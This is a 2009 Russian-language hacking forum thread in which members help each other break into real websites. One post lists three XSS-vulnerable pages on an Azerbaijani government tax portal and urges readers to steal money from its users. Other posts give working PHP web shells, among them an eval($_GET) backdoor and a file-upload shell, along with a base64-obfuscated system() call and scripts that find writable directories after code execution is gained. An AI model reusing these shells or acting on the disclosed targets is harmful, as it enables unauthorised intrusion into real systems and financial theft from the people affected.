HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8921  
Старый 13.09.2009, 16:40
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

http://quest.fsb-my.name/code.php
 
Ответить с цитированием

  #8922  
Старый 13.09.2009, 17:03
Cehennem
Banned
Регистрация: 03.06.2009
Сообщений: 28
Провел на форуме:
82669

Репутация: -26
Exclamation

Цитата:
Сообщение от DIEZalok  
Cehennem
Кавычки слэшируются, из-за этого не пашет, надо закодировать ссылку.
Значит кавычки шлифуются, всё понятно. Сделаю ссылку типа www.site.com/sссылка для сниффер/ и проверю.
Всем спасибо ребята.
И ещё хотел бы поделится с вами, я нашёл на одном сайте xss, а сайт не простой сайт, сайт государственный, на этом сайте у жителей всего Азербайджана, тоесть у миллионов азербайджанцев есть шот, они хранять свои денги. Есть некоторые у которых есть милйарды долларов на счёте. Пользовател может за минуту перевести все свои денги из счёта в другой счёт. Через xss думаю можно ломануть.
Вот сайт: http://www.e-taxes.gov.az/
xss: http://www.taxes.gov.az/?name=birpencere (в поле пишем html команду).
xss: https://www.e-taxes.gov.az/ebyn/TaxPayerChecker.jsp (в поле пишем html команду).
xss: https://www.e-taxes.gov.az/ebyn/edvPayerChecker.jsp (в поле пишем html команду).

Всего нашёл 3-е xss. И ещё скажу что сайт не сайт, а всё дырка!

Так-что ломайте перевадите денги на свой счёт и кайфуйте пока за вами не пришёл Азербайджанский ФБР.
 
Ответить с цитированием

  #8923  
Старый 13.09.2009, 22:17
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Итак господа, при взломе очередного сайта я наткнулся на очередной ребус, который разгадать не могу.
Значит дырка выполнение php кода, пытаюсь залить шелл через такую конструкцию:
fputs(fopen('/www/shell.php',a),base64_decode('B64CODE'));
Шелл заливается нормально, но при попытке зайти на него, белая страница. Дело явно не в .htaccess и не в правах файла.
Если таким образом залить простой сценарий:
Код:
<?php
echo 'LOL';
?>
То он успешно выполняется, но если залить такой:
Код:
<?php
eval($_GET['lol']);
?>
То белая страница. Вот и всё...

Удалённого инклуда нету, через copy тоже самое, wget не работает вообще... Какие мысли на этот счёт у кого?
Лично я с таким сталкиваюсь впервые.
 
Ответить с цитированием

  #8924  
Старый 13.09.2009, 22:35
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

GET запросы могут фильтроваться. В смысле просто слово GET

Попробуй действовать через пост, например так:

<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go></form><?if(isset($_POST[go])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}}?>


PS: неоднократно натыкался на фильтрацию GET или просто запрет записи в файл именно "GET"

В общем рыть в сторону POST вариантов, имхо

ЗЫЖ Плюс

eval($_GET['lol']);

можно смело заменить на

eval($_GET[lol]);

в прямом и переносном смысле - может быть будет другой результат, не мне тебе объяснять, что каждая ситуация всегда практически уникальна

Эксперементировать с ? и & после сам знаешь чего - как не тупо бы выглядело бы - результат иногда разный

Последний раз редактировалось Pashkela; 13.09.2009 в 22:53..
 
Ответить с цитированием

  #8925  
Старый 13.09.2009, 22:41
FriLL
Познающий
Регистрация: 14.09.2008
Сообщений: 30
Провел на форуме:
117615

Репутация: 21
По умолчанию

Цитата:
<?php
eval($_GET['lol']);
?>
а что ты передаеш в lol ??
и вообще должна быть ошибка Undefended variable $_GET['lol']
 
Ответить с цитированием

  #8926  
Старый 13.09.2009, 22:52
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Nightmarе  
То белая страница. Вот и всё...
Ну а что там должно быть-то?
Цитата:
Сообщение от FriLL  
и вообще должна быть ошибка Undefended variable $_GET['lol']
Не обязательно. Как раз белая страница может быть запросто
Цитата:
Сообщение от Pashkela  
неоднакратно натыкался на фильтрацию GET или просто запрет записи в файл именно "GET"
Покажешь пример?
 
Ответить с цитированием

  #8927  
Старый 13.09.2009, 22:55
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Цитата:
Сообщение от Pashkela  
eval($_GET[lol]);
ЧУДО! Спс, вот до этого я не допёр. Да, теперь этот код пашет. Но проблемма с заливкой нормального шелла всё ещё стоит...
 
Ответить с цитированием

  #8928  
Старый 13.09.2009, 22:56
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
jokester:

Покажешь пример?
Зачем? Вы же ГУРУ хакинга, наверное, даже скорее всего я несу бред. Но сегодня простительно Всех с праздником!
 
Ответить с цитированием

  #8929  
Старый 13.09.2009, 23:04
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Но проблемма с заливкой нормального шелла всё ещё стоит...
скорее всего только с правами на запись в папку, выполни такой код, чтобы найти сам знаешь что:

Поиск папки, доступной на запись:

0)<?
// это system('cd ../; find . -perm -2 -type d -ls');
eval(base64_decode(c3lzdGVtKCdjZCAuLi87IGZpbmQgLiA tcGVybSAtMiAtdHlwZSBkIC1scycpOw));
?>

1) $dirs=scandir($_SERVER['DOCUMENT_ROOT']);foreach($dirs as $whot) {if(is_dir($whot) && is_writable($whot)){echo "writeable dir: $whot";}}

2) echo '<pre>';$path = '/абсолютный_путь/http';function fold($rootDir, $allData=array()){$invisibleFileNames = array(".", "..");$dirContent = scandir($rootDir);foreach($dirContent as $key => $content){$path = $rootDir.'/'.$content;if(!in_array($content,$invisibleFileNam es)){if(is_file($path) && is_writable($path)){$allData[] = $path; }elseif(is_dir($path) && is_writable($path)){$allData = fold($path, $allData);}}}return $allData;}$a = fold($path);print_r($a);echo '</pre>';
 
Ответить с цитированием

  #8930  
Старый 13.09.2009, 23:07
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Про запись в папку это и так думаю понятно, в противном случае я никаких файлов создать бы там не смог. Папка на запись есть.

Но судя по всему даже через Базу 64 образуется типа \' что то в этом роде, что и делает скрипт нерабочим... хз даже чё тут придумать.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ